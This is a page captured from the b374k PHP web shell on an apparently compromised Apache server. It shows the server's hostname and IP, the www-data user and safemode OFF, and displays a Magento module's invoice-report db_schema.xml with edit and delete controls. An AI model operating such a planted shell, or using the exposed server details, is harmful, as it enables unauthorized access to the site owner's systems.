b374k
m1n1 1.01
Apache/2.4.41 (Ubuntu)
Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
uid=33(www-data) gid=33(www-data) groups=33(www-data)
server ip : 62.171.164.128 | your ip : 127.0.0.1
safemode OFF
 >  / home / dev2.destoffenstraat.com / app / code / Mrgig / MV / etc /
Filename/home/dev2.destoffenstraat.com/app/code/Mrgig/MV/etc/db_schema.xml
Size1.97 kb
Permissionrwxrwxrwx
Ownerroot : root
Create time17-Aug-2025 10:26
Last modified23-Mar-2022 11:13
Last accessed23-Aug-2025 02:07
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
<?xml version="1.0"?>
<schema xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="urn:magento:framework:Setup/Declaration/Schema/etc/schema.xsd">
<table name="sales_invoice">
<column xsi:type="int" name="is_process" padding="10" unsigned="true" nullable="false" identity="false" default="0" comment="Invoice is process"/>
</table>
<table name="mv_invoice_report" resource="default" engine="innodb" comment="MV Invoice Report">
<column xsi:type="int" name="id" unsigned="true" nullable="false" identity="true" comment="Report ID"/>
<column xsi:type="int" name="invoice_id" unsigned="false" nullable="true" identity="false" comment="Invoice ID"/>
<column xsi:type="varchar" name="increment_id" nullable="true" length="50" comment="Increment ID"/>
<column xsi:type="longtext" name="send_content" nullable="true" comment="Send Content"/>
<column xsi:type="timestamp" name="created_at" on_update="false" nullable="false" default="CURRENT_TIMESTAMP" comment="Created At"/>
<constraint xsi:type="primary" referenceId="PRIMARY">
<column name="id"/>
</constraint>
<index referenceId="MV_INVOICE_REPORT_INVOICE_ID" indexType="btree">
<column name="invoice_id"/>
</index>
</table>
<table name="mv_invoice_report_history" resource="default" engine="innodb" comment="MV Invoice Report History">
<column xsi:type="int" name="history_id" unsigned="true" nullable="false" identity="true" comment="History ID"/>
<column xsi:type="varchar" name="invoice_id" nullable="false" default="0" length="255" comment="Zoro Order Id"/>
<column xsi:type="text" name="comment" nullable="true" comment="Comment"/>
<column xsi:type="timestamp" name="created_at" on_update="false" nullable="false" default="CURRENT_TIMESTAMP"
comment="Created At"/>
<constraint xsi:type="primary" referenceId="PRIMARY">
<column name="history_id"/>
</constraint>
</table>
</schema>